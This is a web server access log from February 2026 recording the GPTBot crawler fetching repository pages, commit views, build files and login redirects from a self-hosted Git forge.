[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:20:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 9797] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11022] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" -[17/Feb/2026:17:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" -[17/Feb/2026:17:20:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/index.html" -[17/Feb/2026:17:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/index.html" -[17/Feb/2026:17:20:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/index.html" -[17/Feb/2026:17:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/index.html" -[17/Feb/2026:17:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" -[17/Feb/2026:17:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11020] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/README.md" -[17/Feb/2026:17:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11020] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" -[17/Feb/2026:17:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" -[17/Feb/2026:17:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" -[17/Feb/2026:17:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11021] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" -[17/Feb/2026:17:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" -[17/Feb/2026:17:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/README.md" -[17/Feb/2026:17:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" -[17/Feb/2026:17:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" -[17/Feb/2026:17:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" -[17/Feb/2026:17:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" -[17/Feb/2026:17:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" -[17/Feb/2026:17:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11020] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" -[17/Feb/2026:17:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11018] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" -[17/Feb/2026:17:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" -[17/Feb/2026:17:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" -[17/Feb/2026:17:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" -[17/Feb/2026:17:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11019] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" -[17/Feb/2026:17:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 107184] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:17:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108777] [Gzip 18.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:17:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108808] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:17:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108803] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:17:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108391] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:17:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108418] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:17:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 107188] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:17:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108424] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:17:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 107158] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:17:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" -[17/Feb/2026:17:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor0.py" [Client 74.7.227.38] [Length 31352] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPostgres.ico" [Client 74.7.227.38] [Length 20553] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:17:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:17:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72036] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10446] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12681] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject" [Client 74.7.227.38] [Length 10967] 